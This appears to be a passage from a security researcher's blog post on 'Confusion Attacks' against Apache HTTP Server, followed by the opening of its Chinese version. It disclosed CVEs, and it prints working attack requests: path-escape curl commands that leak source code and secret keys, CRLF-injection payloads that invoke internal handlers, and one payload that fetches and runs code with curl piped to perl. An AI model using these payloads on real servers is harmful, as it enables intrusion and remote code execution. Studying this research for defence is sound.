SetHandler"proxy:unix:/run/php/php8.2-fpm.sock|fcgi://localhost"</FilesMatch>

The mod_proxy will rewrite r->filename to the following URL and call the sub-module mod_proxy_fcgi to handle the subsequent FastCGI protocol:

proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php

Since the backend receives the filename in a strange format, PHP-FPM has to handle this behavior specially. The logic of this handling is as follows:

Path: sapi/fpm/fpm/fpm_main.c#L1044

#define APACHE_PROXY_FCGI_PREFIX "proxy:fcgi://"
#define APACHE_PROXY_BALANCER_PREFIX "proxy:balancer://"if(env_script_filename&&strncasecmp(env_script_filename,APACHE_PROXY_FCGI_PREFIX,sizeof(APACHE_PROXY_FCGI_PREFIX)-1)==0){/* advance to first character of hostname */char*p=env_script_filename+(sizeof(APACHE_PROXY_FCGI_PREFIX)-1);while(*p!='\0'&&*p!='/'){p++;/* move past hostname and port */}if(*p!='\0'){/* Copy path portion in place to avoid memory leak.  Note
         * that this also affects what script_path_translated points
         * to. */memmove(env_script_filename,p,strlen(p)+1);apache_was_here=1;}/* ignore query string if sent by Apache (RewriteRule) */p=strchr(env_script_filename,'?');if(p){*p=0;}}

As you can see, PHP-FPM first normalizes the filename and splits it at the question mark ? to extract the actual file path for execution (which is /var/www/html/admin.php). This leads to the bypass, and basically, all authentications or access controls based on the Files directive for a single PHP file are at risk when running together with PHP-FPM!😮

Many potentially risky configurations can be found on GitHub, such as phpinfo() restricted to internal network access only:

# protect phpinfo, only allow localhost and local network access<Files php-info.php>
# LOCAL ACCESS ONLY# Require local # LOCAL AND LAN ACCESSRequire ip 10 172 192.168
</Files>

Adminer blocked by .htaccess:

<Files adminer.php>
Order Allow,Deny
    Denyfromall</Files>

Protected xmlrpc.php:

<Files xmlrpc.php>
Order Allow,Deny
    Denyfromall</Files>

CLI tools prevented from direct access:

<Files"cron.php">
Denyfromall</Files>

Through an inconsistency in how the authentication module and mod_proxy interpret the r->filename field, all the above examples can be successfully bypassed with just a ?.


🔥 2. DocumentRoot Confusion

The next attack we’re diving into is the confusion based on DocumentRoot! Let’s consider this Httpd configuration for a moment:

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

When you visit the URL http://server/html/about, which file do you think Httpd actually opens? Is it the one under the root directory, /about.html, or is it from the DocumentRoot at /var/www/html/about.html?

The answer is — it accesses both paths. Yep, that’s our second Confusion Attack. For any[1]RewriteRule, Apache HTTP Server always tries to open both the path with DocumentRoot and without it! Amazing, right? 😉

[1] Located within Server Config or VirtualHost Block

Path: modules/mappers/mod_rewrite.c#L4939

if(!(conf->options&OPTION_LEGACY_PREFIX_DOCROOT)){uri_reduced=apr_table_get(r->notes,"mod_rewrite_uri_reduced");}if(!prefix_stat(r->filename,r->pool)||uri_reduced!=NULL){// <------ [1] access without rootintres;char*tmp=r->uri;r->uri=r->filename;res=ap_core_translate(r);// <------ [2] access with rootr->uri=tmp;if(res!=OK){rewritelog((r,1,NULL,"prefixing with document_root of %s"" FAILED",r->filename));returnres;}rewritelog((r,2,NULL,"prefixed with document_root to %s",r->filename));}rewritelog((r,1,NULL,"go-ahead with %s [OK]",r->filename));returnOK;}

Most of the time, the version without DocumentRoot doesn’t exist, so Apache HTTP Server goes for the version with the DocumentRoot. But this behavior already lets us “intentionally” access paths outside the Web Root. If today we can control the prefix of the RewriteRule, couldn’t we access any file on the system? That’s the spirit of our second Confusion Attack! You can find numerous problematic configurations on GitHub, and even the examples from official Apache HTTP Server documentations are vulnerable to attacks:

# Remove mykey=???RewriteCond"%{QUERY_STRING}""(.*(?:^|&))mykey=([^&]*)&?(.*)&?$"RewriteRule"(.*)""$1?%1%3"

There are other RewriteRule that are also affected, such as rules based on caching needs or hiding file extensions:

RewriteRule"^/html/(.*)$""/$1.html"

The Rule trying to save bandwidth by opting for compressed versions of static files:

RewriteRule"^(.*)\.(css|js|ico|svg)""$1\.$2.gz"

The rule redirecting old URLs to the main site:

RewriteRule"^/oldwebsite/(.*)$""/$1"

The rule returning a 200 OK for all CORS preflight requests:

RewriteCond %{REQUEST_METHOD} OPTIONSRewriteRule ^(.*)$ $1 [R=200,L]

Theoretically, as long as the target prefix of a RewriteRule is controllable, we can access nearly the entire filesystem. But from the real-world cases above, extensions like .html and .gz are the restrictions that keep us from being truly free. So, can we access files outside .html? I am not sure if you remember the primitive of Path Truncation from the Filename Confusion earlier? By combining these two primitives, we can freely access arbitrary files on the filesystem!

The following demonstrations are all based on this unsafe RewriteRule:

RewriteEngineOnRewriteRule"^/html/(.*)$""/$1.html"


⚔️ Primitive 2-1. Server-Side Source Code Disclosure

Let’s introduce the first primitive of DocumentRoot Confusion — Arbitrary Server-Side Source Code Disclosure!

Since Apache HTTP Server decides whether to consider a file as a Server-Side Script based on the current directory or virtual host configuration, accessing target via an absolute path can confuse Httpd’s logic, causing it to leak contents that should have been executed as code.

✔️ 2-1-1. Disclose CGI Source Code

Starting with the disclosure of server-side CGI source code, since mod_cgi binds the CGI folder to a specified URL prefix via ScriptAlias, directly accessing a CGI file using its absolute path can leak its source code due to the change of URL prefix.

$ curl http://server/cgi-bin/download.cgi
 # the processed result from download.cgi$ curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
 # #!/usr/bin/perl# use CGI;# ...# # the source code of download.cgi
✔️ 2-1-2. Disclose PHP Source Code

Next is the disclosure of server-side PHP source code. Given that PHP has numerous use cases, if PHP environments are applied only to specific directories or virtual hosts (which is common in web hosting), accessing PHP files from a virtual host which didn’t support PHP can disclose the source code!

For example, www.local and static.local are two websites hosted on the same server; www.local allows PHP execution while static.local only serves static files. Hence, you can disclose sensitive info from config.php like this:

$ curl http://www.local/config.php
 # the processed result (empty) from config.php$ curl http://www.local/var/www.local/config.php%3F -H"Host: static.local"# the source code of config.php


⚔️ Primitive 2-2. Local Gadgets Manipulation!

Next up is our second primitive — Local Gadgets Manipulation.

First, when we talked about “accessing any file on the filesystem,” did you wonder: “Hey, could an unsafe RewriteRule access /etc/passwd?” The answer is Yes, and also no. What?

Technically, the server does check if /etc/passwd exists, but Apache HTTP Server’s built-in access control blocks our access. Here’s a snippet from Apache HTTP Server’s configuration template:

<Directory />
AllowOverrideNoneRequireall denied
</Directory>

You’ll notice it defaults to blocking access to the root directory / (Require all denied). So our “arbitrary file access” ability seems a bit less “any.” Does that mean the show’s over? Not really! We have already broken the trust of only-allowed-access to the DocumentRoot, it’s a significant step forward!

A closer inspection of different Httpd distributions reveals that Debian/Ubuntu operating systems by default allow /usr/share:

<Directory /usr/share>
AllowOverrideNoneRequireall granted
</Directory>

So, the next step is to “squeeze” all possibilities within this directory. All available resources, such as existing tutorials, documentation, unit test files, and even programming languages like PHP, Python, and even PHP modules could become targets for our abuse!

P.S. Of course, the exploitation here is based on the Httpd distributed by Ubuntu/Debian operating systems. However, in practice, we have also found that some applications remove the Require all denied line from the root directory, allowing direct access to /etc/passwd.

✔️ 2-2-1. Local Gadget to Information Disclosure

Let’s hunt for potentially exploitable files in this directory. First off, if the target Apache HTTP Server has the websocketd service installed, the default package includes an example PHP script dump-env.php under /usr/share/doc/websocketd/examples/php/. If there’s a PHP environment on the target server, this script can be accessed directly to leak sensitive environment variables.

Additionally, if the target has services like Nginx or Jetty installed, though /usr/share is theoretically a read-only copy for package installation, these services still place their default Web Roots under /usr/share, making it possible to leak sensitive web application information, such as the web.xml in Jetty.

  • /usr/share/nginx/html/
  • /usr/share/jetty9/etc/
  • /usr/share/jetty9/webapps/

Here’s a simple demonstration using setup.php from the Davical package, which exists as a read-only copy, to leak contents of phpinfo().

✔️ 2-2-2. Local Gadget to XSS

Next, how to turn this primitive into XSS? On the Ubuntu Desktop environment, LibreOffice, an open-source office suite, is installed by default. We can leverage the language switch feature in the help files to achieve XSS.

Path: /usr/share/libreoffice/help/help.html

varurl=window.location.href;varn=url.indexOf('?');if(n!=-1){// the URL came from LibreOffice help (F1)varversion=getParameterByName("Version",url);varquery=url.substr(n+1,url.length);varnewURL=version+'/index.html?'+query;window.location.replace(newURL);}else{window.location.replace('latest/index.html');}

Thus, even if the target hasn’t deployed any web application, we can still create XSS using an unsafe RewriteRule through files that come within the operating system.

✔️ 2-2-3. Local Gadget to LFI

What about arbitrary file reading? If the target server has PHP or frontend packages installed, like JpGraph, jQuery-jFeed, or even WordPress or Moodle plugins, their tutorials or debug consoles can become our gadgets, for example:

  • /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
  • /usr/share/javascript/jquery-jfeed/proxy.php
  • /usr/share/moodle/mod/assignment/type/wims/getcsv.php

Here’s a simple example exploiting proxy.php from jQuery-jFeed to read /etc/passwd:

✔️ 2-2-4. Local Gadget to SSRF

Finding an SSRF vulnerability is also a piece of cake, for instance, MagpieRSS offers a magpie_debug.php file, which is fabulous gadget for exploiting:

  • /usr/share/php/magpierss/scripts/magpie_debug.php
✔️ 2-2-5. Local Gadget to RCE

So, can we achieve RCE? Hold on, let’s take it step by step! First, This primitive can reapply all known existing attacks again, like an old version of PHPUnit left behind by development or third-party dependencies, can be directly exploited using CVE-2017-9841 to execute arbitrary code. Or phpLiteAdmin installed with a read-only copy, which by default has the password admin. By now, you should see the vast potential of Local Gadgets Manipulation. What remains is to discover even more powerful and universal gadgets!


⚔️ Primitive 2-3. Jailbreak from Local Gadgets

You might ask: “Can’t we really break out of /usr/share?” Of course, we can, that brings out our third primitive — Jailbreak from /usr/share!

In Debian/Ubuntu distributions of Httpd, the FollowSymLinks option is explicitly enabled by default. Even in non-Debian/Ubuntu versions, Apache HTTP Server also implicitly allows Symbolic Links by default.

<Directory />
OptionsFollowSymLinksAllowOverrideNoneRequireall denied
</Directory>
✔️ 2-3-1. Jailbreak from Local Gadgets

So, any package that has a Symbolic Link in its installation directory pointing outside of /usr/share can become a stepping-stone to access more gadgets for further exploitation. Here are some useful Symbolic Links we’ve discovered so far:

  • Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
  • Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
  • Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
  • MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
  • SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/
✔️ 2-3-2. Jailbreak Local Gadgets to Redmine RCE

To wrap up our jailbreak primitive, let’s showcase how to perform an RCE using a double-hop Symbolic Link in Redmine. In the default installation of Redmine, there’s an instances/ folder pointing to /var/lib/redmine/, and within /var/lib/redmine/, the default/config/ folder points to the /etc/redmine/default/ directory, which holds Redmine’s database setting and secret key.

$ file /usr/share/redmine/instances/
 symbolic link to /var/lib/redmine/
$ file /var/lib/redmine/config/
 symbolic link to /etc/redmine/default/
$ ls /etc/redmine/default/
 database.yml    secret_key.txt

Thus, through an insecure RewriteRule and two Symbolic Links, we can easily access the application secret key used by Redmine:

$ curl http://server/html/usr/share/redmine/instances/default/config/secret_key.txt%3f
 HTTP/1.1 200 OK
 Server: Apache/2.4.59 (Ubuntu) 
 ...
 6d222c3c3a1881c865428edb79a74405

And since Redmine is a Ruby on Rails application, the content of secret_key.txt is actually the key used for signing and encrypting. The next step should be familiar to those who have attacked RoR before: by embedding malicious Marshal objects, signed and encrypted with the known keys, into cookies, and then achieving remote code execution through Server-Side Deserialization!


🔥 3. Handler Confusion

The final attack I’m going to introduce is the confusion based on Handler. This attack also leverages a piece of technical debt that has been left over from the legacy architecture of Apache HTTP Server. Let’s quickly understand this technical debt through an example — if today you want to run the classic mod_php on Apache HTTP Server, which of the following two directives do you use?

AddHandler application/x-httpd-php .php
AddType    application/x-httpd-php .php

The answer is — both can correctly get PHP running! Here are the two directive syntaxes, and you can see that not only are the usages similar, but even the effects are exactly the same. Why did Apache HTTP Server initially design two different directives doing the same thing?

AddHandlerhandler-nameextension [extension] ...
AddTypemedia-typeextension [extension] ...

Actually, handler-name and media-type represent different fields within Httpd’s internal structure, corresponding to r->handler and r->content_type, respectively. The fact that users can use them interchangeably without realizing it is thanks to a piece of code that has been in Apache HTTP Server since its early development in 1996:

Path: server/config.c#L420

AP_CORE_DECLARE(int)ap_invoke_handler(request_rec*r){// [...]if(!r->handler){if(r->content_type){handler=r->content_type;if((p=ap_strchr_c(handler,';'))!=NULL){char*new_handler=(char*)apr_pmemdup(r->pool,handler,p-handler+1);char*p2=new_handler+(p-handler);handler=new_handler;/* exclude media type arguments */while(p2>handler&&p2[-1]=='')--p2;/* strip trailing spaces */*p2='\0';}}else{handler=AP_DEFAULT_HANDLER_NAME;}r->handler=handler;}result=ap_run_handler(r);

You can see that before entering the ap_run_handler(), if r->handler is empty, the content of the r->content_type is used as the final module handler. This is also why AddType and AddHandler have the identical effect, because the media-type is eventually converted into the handler-name before handling. So, our third Handler Confusion is mainly developed around this behavior.


⚔️ Primitive 3-1. Overwrite the Handler

By understanding this conversion mechanism, the first primitive is — Overwrite the Handler. Imagine if today the target Apache HTTP Server uses AddType to run PHP.

AddType application/x-httpd-php  .php

In the normal process, when accessing http://server/config.php, mod_mime, during the type_checker phase, Httpd copies the corresponding content into r->content_type based on the file extension set by AddType. Since r->handler is not assigned during the entire HTTP lifecycle, ap_invoke_handler() will treat r->content_type as the handler, ultimately calling mod_php to handle the request.

However, what happens if any module “accidentally” overwrites r->content_type before reaching ap_invoke_handler()?

✔️ 3-1-1. Overwrite Handler to Disclose PHP Source Code

The first exploitation of this primitive is to disclose arbitrary PHP source code by the “accidentally-overwrite”. This technique was first mentioned by Max Dmitriev in his research presented at ZeroNights 2021 (kudos to him!), and you can check his slides here:

Apache 0day bug, which still nobody knows of, and which was fixed accidentally

Max Dmitriev observed that by sending an incorrect Content-Length, the remote Httpd server would trigger an unexpected error and inadvertently return the source code of PHP script. Upon investigating the process, he discovered that the issue was due to ModSecurity not properly handling the return value of AP_FILTER_ERROR while using the Apache Portable Runtime (APR) library, leading to a double response. When an error occurred, Httpd attempts to send out HTML error messages, thus accidentally overwriting r->content_type to text/html.

Because ModSecurity did not properly handle the return values, the internal HTTP lifecycle that should have stopped continued. This “side effect” also overwrote the originally added Content-Type, resulting in files that should have been processed as PHP being treated as plain documents, exposing its source code and sensitive settings. 🤫

$ curl -v http://127.0.0.1/info.php -H"Content-Length: x"> HTTP/1.1 400 Bad Request
> Date: Mon, 29 Jul 2024 05:32:23 GMT
> Server: Apache/2.4.41 (Ubuntu)> Content-Type: text/html;charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title>
...
<?php phpinfo();?>

In theory, all configurations based on Content-Type are vulnerable to this type of attack, so apart from the php-cgi paired with mod_actions shown in Max’s slides, pure mod_php coupled with AddType is also affected.

It’s worth mentioning that this side effect was corrected as a request parser bug in Apache HTTP Server version 2.4.44, thus treating this “vulnerability” as fixed until I picked it up again. However, since the root cause is still ModSecurity not handling errors properly, the same behavior can still be successfully reproduced if another code path that triggers AP_FILTER_ERROR is found.

P.S. This issue was reported to ModSecurity through the official security mail on 6/20, and the Project Co-Leader suggested returning to the original GitHub Issue for discussion.

✔️ 3-1-2. Overwrite Handler to ██████ ███████ ██████

Based on the double response behavior and its side effects mentioned earlier, this primitive could lead to other more cool exploitations. However, as this issue has not been fully fixed, further exploitation will be disclosed after the issue is fully resolved.


⚔️ Primitive 3-2. Invoke Arbitrary Handlers

Let’s think more carefully about the previous Overwrite Handler primitive, although it’s caused by ModSecurity not properly handling errors, leading to the request being set with the wrong Content-Type, the deeper fundamental root cause should be — when using r->content_type, Apache HTTP Server actually cannot distinguish its semantics; this field can be set by directive during the request phase or used as the Content-Type header in the server response.

Theoretically, if you can control the Content-Type header in the server response, you could invoke arbitrary module handlers through this legacy code snippet. This is the last primitive of Handler Confusion — invoking any internal module handler!

However, there’s still one last piece of the puzzle. In Httpd, all modifications to r->content_type from the server response occur after that legacy code. So, even if you can control the value of that field, at that point in the HTTP lifecycle, it’s too late to do further exploitation… is that right?

We turned to RFC 3875 for a rescue! RFC 3875 is a specification about CGI, and Section 6.2.2 defines a Local Redirect Response behavior:

The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.

Simply put, the specification mandates that under certain conditions, CGI must use Server-Side resources to handle redirects. A close examination of mod_cgi implementation of this specification reveals:

Path: modules/generators/mod_cgi.c#L983

if((ret=ap_scan_script_header_err_brigade_ex(r,bb,sbuf,// <------ [1]APLOG_MODULE_INDEX))){ret=log_script(r,conf,ret,dbuf,sbuf,bb,script_err);// [...]if(ret==HTTP_NOT_MODIFIED){r->status=ret;returnOK;}returnret;}location=apr_table_get(r->headers_out,"Location");if(location&&r->status==200){// [...]}if(location&&location[0]=='/'&&r->status==200){// <------ [2]/* This redirect needs to be a GET no matter what the original
         * method was.
         */r->method="GET";r->method_number=M_GET;/* We already read the message body (if any), so don't allow
         * the redirected request to think it has one.  We can ignore
         * Transfer-Encoding, since we used REQUEST_CHUNKED_ERROR.
         */apr_table_unset(r->headers_in,"Content-Length");ap_internal_redirect_handler(location,r);// <------ [3]returnOK;}

Initially, mod_cgi executes[1] CGI and scans its output to set the corresponding headers such as Status and Content-Type. If[2] the returned Status is 200 and the Location header starts with a /, the response is treated as a Server-Side Redirection and should be processed[3] internally. A closer look at the implementation of ap_internal_redirect_handler() shows:

Path: modules/http/http_request.c#L800

AP_DECLARE(void)ap_internal_redirect_handler(constchar*new_uri,request_rec*r){intaccess_status;request_rec*new=internal_internal_redirect(new_uri,r);// <------ [1]/* ap_die was already called, if an error occured */if(!new){return;}if(r->handler)ap_set_content_type(new,r->content_type);// <------ [2]access_status=ap_process_request_internal(new);// <------ [3]if(access_status==OK){access_status=ap_invoke_handler(new);// <------ [4]}ap_die(access_status,new);}

Httpd first creates[1] a new request structure and copie[2] the current r->content_type into it. After processing[3] the lifecycle, it calls[4]ap_invoke_handler()— the place including the legacy transformation. So, in Server-Side Redirects, if you can control the response headers, you can invoke any module handler within Httpd. Basically, all CGI implementations in Apache HTTP Server follow this behavior, and here’s a simple list:

  • mod_cgi
  • mod_cgid
  • mod_wsgi
  • mod_uwsgi
  • mod_fastcgi
  • mod_perl
  • mod_asis
  • mod_fcgid
  • mod_proxy_scgi

As for how to trigger this server-side redirect in real-world scenarios? Since you need at least control over the response’s Content-Type and part of the Location, here are two scenarios for reference:

  1. CRLF Injection in the CGI response headers, allowing overwriting of existing HTTP headers by new lines.
  2. SSRF that can completely control the response headers, such as a project hosted on mod_wsgi like django-revproxy.

The following examples are all based on this insecure CRLF Injection for the purpose of demonstration:

#!/usr/bin/perl useCGI;my$q=CGI->new;my$redir=$q->param("r");if($redir=~m{^https?://}){print"Location: $redir\n";}print"Content-Type: text/html\n\n";
✔️ 3-2-1. Arbitrary Handler to Information Disclosure

Starting with invoking an arbitrary handler to disclose information, we use the built-in server-status handler in Apache HTTP Server, which is typically only allowed to be accessed locally:

<Location /server-status>
SetHandler server-status
    Require local
</Location>

With the ability to invoke any handler, it becomes possible to overwrite the Content-Type to access sensitive information that should not be accessible remotely:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a

✔️ 3-2-2. Arbitrary Handler to Misinterpret Scripts

It’s also easy to transform an image with a legitimate extension into a PHP backdoor. For instance, this primitive allows specifying mod_php to execute embedded malicious code within the image, like:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/uploads/avatar.webp %0d%0a
Content-Type:application/x-httpd-php %0d%0a
%0d%0a

✔️ 3-2-2. Arbitrary Handler to Full SSRF

Calling the mod_proxy to access any protocol on any URL is, of course, straightforward:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:http://example.com/%3f %0d%0a
%0d%0a

Moreover, this is also a full-control SSRF where you can control all request headers and obtain all HTTP responses! A slight disappointment is when accessing Cloud Metadata, mod_proxy automatically adds an X-Forwarded-For header, which gets blocked by EC2 and GCP’s Metadata protection mechanisms, otherwise, this would be an even more powerful primitive.

✔️ 3-2-3. Arbitrary Handler to Access Local Unix Domain Socket

However, mod_proxy offers a more “convenient” feature — it can access local Unix Domain Sockets! 😉

Here’s a demonstration accessing PHP-FPM’s local Unix Domain Socket to execute a PHP backdoor located in /tmp/:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a

Theoretically, this technique has even more potential, such as protocol smuggling (smuggling FastCGI in HTTP/HTTPS protocols 😏) or exploiting other vulnerable local sockets. These possibilities are left for interested readers to explore.

✔️ 3-2-4. Arbitrary Handler to RCE

Finally, let’s demonstrate how to transform this primitive into an RCE using a common CTF trick! Since the official PHP Docker image includes PEAR, a command-line PHP package management tool, using its Pearcmd.php as an entry point allows us to achieve further exploitation. You can check this article — Docker PHP LFI Summary, written by Phith0n for details!

Here we utilize a Command Injection within run-tests to complete the entire exploit chain, detailed as follows:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

It’s common to see CRLF Injection or Header Injection being reported as XSS in Security Advisories or Bug Bounties. While it is true that these can sometimes chain to impactful vulnerabilities like Account Takeover through SSO, please don’t forget that they can also lead to Server-Side RCE, as this demonstration proves its potential!


🔥 4. Other Vulnerabilities

While this essentially covers the Confusion Attacks, some minor vulnerabilities discovered during our research of Apache HTTP Server are worth mentioning separately.


⚔️ CVE-2024-38472 - Windows UNC-based SSRF

Firstly, the Windows implementation of the apr_filepath_merge() function allows the use of UNC paths, which allows attackers to coerce NTLM authentication to any host. Here we list two different triggering paths:

✔️ Triggered via HTTP Request Parser

Direct triggering through an HTTP request parser in Httpd requires additional configuration, which might seem impractical at first glance but often appears with Tomcat (mod_jk, mod_proxy_ajp) or pairing with PATH_INFO:

AllowEncodedSlashesOn

Additionally, since Httpd rewrote its core HTTP request parser logic after 2.4.49, triggering the vulnerability in versions above requires an additional configuration:

AllowEncodedSlashesOn
MergeSlashes Off

By using two %5C can force Httpd to coerce NTLM authentication to an attacker-server, and practically, this SSRF can be converted into RCE through NTLM Relay!

$ curl http://server/%5C%5Cattacker-server/path/to

✔️ Triggered via Type-Map

In the Debian/Ubuntu distribution of Httpd, Type-Map is enabled by default:

AddHandler type-map var

By uploading a .var file to the server and setting the URI field to a UNC path, you can also force the server to coerce NTLM authentication to the attacker. This is also the second .var trick I proposed. 😉


⚔️ CVE-2024-39573 - SSRF via Full Control of RewriteRule Prefix

Lastly, when you have full control over the prefix of a RewriteRule substitution target in Server Config or VirtualHost is fully controllable, you can invoke mod_proxy and its sub-modules:

RewriteRule ^/broken(.*) $1

Using the following URL can delegate the request to mod_proxy for processing:

$ curl http://server/brokenproxy:unix:/run/[...]|http://path/to

But if administrators have tested the rule properly, they would realize that such rules are impractical. Thus, originally it was reported along with another vulnerability as an exploit chain, but this behavior was also treated as a security boundary fix by the security team. As the patches came out, other researchers applied the same behavior to Windows UNC and obtained another additional CVE.


Future Works

Finally, let’s talk about future works and areas for improvement in this research. Confusion Attacks are still a very promising attack surface, especially since my research focused mainly on just two fields. Unless the Apache HTTP Server undergoes architectural improvements or provides better development standards, I believe we’ll see more “confusions” in the future!

So, what other areas could be enhanced? In reality, different Httpd distributions have different configurations, so other Unix-Like systems such as the RHEL series, BSD family, and even applications that utilize Httpd might have more escapable RewriteRule, more powerful local gadgets, and unexpected symbolic jumps. These are all left for those interested to continue exploring.

Due to time constraints, I was unable to share more real-world cases found and exploited in actual websites, devices, or even open-source projects. However, you can probably imagine — the real world is still full of countless unexplored rules, bypassable authentications, and hidden CGIs waiting to be uncovered. How to hunt these techniques worldwide? That’s your mission!


Conclusion

Maintaining an open-source project is truly challenging, especially when trying to balance user convenience with the compatibility of older versions. A slight oversight can lead to the entire system being compromised, such as what happened with Httpd 2.4.49, where a minor change in path processing logic led to the disastrous CVE-2021-41773. The entire development process must be carefully built upon a pile of legacy code and technical debt. So, if any Apache HTTP Server developers are reading this: Thank you for your hard work and contributions!

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

$
0
0
Orange Tsai (@orange_8361)  |  繁體中文版本 |  English Version

嗨,這是我今年發表在 Black Hat USA 2024上針對 Apache HTTP Server 的研究。 此外,這份研究也將在 HITCONOrangeCon上發表,有興趣搶先了解可點此取得投影片:

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

另外也謝謝來自 Akamai 的友善聯繫! 此份研究發表後第一時間他們也發佈了緩解措施 (詳情可參考 Akamai 的部落格)。


TL;DR

這篇文章探索了 Apache HTTP Server 中存在的架構問題,介紹了數個 Httpd 的架構債,包含 3 種不同的 Confusion Attacks、9 個新漏洞、20 種攻擊手法以及超過 30 種案例分析。 包括但不限於:

  1. 怎麼使用一個 ?繞過 Httpd 內建的存取控制以及認證。
  2. 不安全的 RewriteRule怎麼跳脫 Web Root 並存取整個檔案系統。
  3. 如何利用一段從 1996 遺留至今的程式碼把一個 XSS 轉化成 RCE。


大綱


在故事之前

這裡純粹是一些個人的 Murmur,如果只對技術細節感興趣可以直接跳到 —— 故事是如何開始的?

身為一名研究員、最大的快樂應該就是當自己的作品被同行關注並理解。所以當完成一個作品並擁有豐碩的成果後,理所當然會想要讓它被世界看到 —— 這也是為什麼我會多次在 Black Hat USA 以及 DEFCON 上分享的緣故。 在讀這篇文章的你也許知道,我從 2022 後就拿不到一個合法的簽證進入美國 (在免簽計畫中的台灣,通常只需要線上申請,數分鐘到數小時內就能取得旅行授權),導致錯過 Black Hat USA 2022的實體演講。甚至 2023 到秘魯還有復活節島獨旅也無法從美國轉機 :(

為了解決這個情況,我從今年一月就開始準備 B1/B2 簽證、撰寫各式文件、到大使館面試以及漫無止盡的等待,這不是一件好玩的事,但為了讓作品被看到,還是花了非常多的時間在為了簽證奔波,以及尋求各種可能,甚至到會議開始的前三個禮拜,還不清楚發表是否會被取消 (BH 一開始只接受現場演講,不過謝謝審稿委員對這份研究的認可最終還是能透過預錄的形式發表),所以你所看到的所有內容包含投影片、錄影以及部落格文字都是在短短數十天內完成的。 😖

我只是一個單純的研究員,自認問心無愧,對漏洞的態度也始終是 —— 漏洞就該讓它被廠商知道以及修復。 寫這些文字也不為了什麼,純粹紀錄下一些無奈的心情、今年所做過的努力,以及謝謝在這個過程中幫助過我的人,謝謝你們 :)


故事是如何開始的?

大概是在今年年初的時候,我開始思考下一個研究的目標,也許你知道我總是希望挑戰那些影響整個網際網路的大目標,所以開始尋找一些看似複雜的主題或有趣的開源專案,例如 Nginx、PHP、甚至開始看起 RFC 來強化自己對於協議實作細節的認知。

雖然大部分的嘗試都以失敗告終 (不過有些也許會變成下一篇部落格主題 😉),但在細細品嘗這些程式碼時,我回憶起了曾經在去年年中短暫看過 Apache HTTP Server 原始碼這件事! 儘管最終由於工作的時程規畫並無深入的閱讀程式碼,但在那時就已經從它的編碼風格上「聞」到了一些不太好的味道。

於是在今年決定繼續下去,把「為什麼聞起來怪怪的」這件事從原本只是一個說不出的「感覺」具象化,深入下去研究 Apache HTTP Server!


為什麼 Apache HTTP Server 聞起來臭臭的?

首先,Apache HTTP Server 是一個由「模組們」建構起來的世界,從它官方文件中也看到其對於自身模組化 (MPMs - Multi-Processing Modules) 的自豪:

Apache httpd has always accommodated a wide variety of environments through its modular design. […] Apache HTTP Server 2.0 extends this modular design to the most basic functions of a web server.

整個 Httpd 的服務需要由數百個小模組齊心合力,共同合作才能完成客戶端的 HTTP 請求,官方所列出的 136 個模組其中約有快一半是預設啟用或經常被使用的模組

而更令人驚訝的是,這麼多模組在處理客戶端 HTTP 請求的時候,彼此之間還要共同維護著一份非常巨大的 request_rec結構。 這個結構包括了在處理 HTTP 時會用到的一切元素,詳細的定義可以從 include/httpd.h中找到。 所有模組都依賴這個巨大的結構去同步、溝通,甚至交換資料。 這個內部結構會像是拋接球般在所有模組間傳遞來傳遞去,每個模組都可以根據自己的喜好去隨意修改這個結構上的任意值!

這樣子的合作方式從軟體工程的角度來說其實不是什麼新鮮事,個體只需專心把份內事完成,只要所有人都乖乖完成自己的工作,那客戶就可以正常享受 Httpd 所提供的服務。 這樣子的分工在數個模組內可能還沒什麼問題,但如果今天把規模放大到數百個模組間的協同合作 —— 它們真的有辦法好好合作嗎?🤔

所以我們的出發點很簡單 —— 模組間其實並不完全了解彼此的實作細節,但卻又被要求要一起合作。 每個模組可能由不同的開發者實作,程式碼歷經多年的疊代、重整以及修改,它們真的還清楚自己在做什麼嗎? 就算對自己瞭若指掌,那對其它模組呢? 在缺乏一個好的開發標準或使用準則下,這中間必然會存在很多小縫隙是我們可以利用的!


關於這次的新攻擊面: Confusion Attacks

基於前面的思考,我們開始專注在研究這些模組間的「關係」以及「交互作用」。 如果有一個模組不小心修改到了它覺得不重要但對另一個模組至關重要的結構欄位,那可能就會影響該模組的判斷。 甚至更進一步,如果 Apache HTTP Server 對這些結構的定義不夠精確,導致不同模組對同一個欄位在理解上有著根本的不一致,這都可能產生安全上的風險!

從這個出發點我們發展出了三種不同的攻擊,由於這些攻擊或多或少都模組對於結構欄位的誤用有關,因此把這個攻擊面命名為「Confusion Attack」,而以下是我們所發展出的攻擊:

  1. Filename Confusion
  2. DocumentRoot Confusion
  3. Handler Confusion

從這些攻擊出發我們找到了 9 個不同的漏洞:

  1. CVE-2024-38472 - Apache HTTP Server on Windows UNC SSRF
  2. CVE-2024-39573 - Apache HTTP Server proxy encoding problem
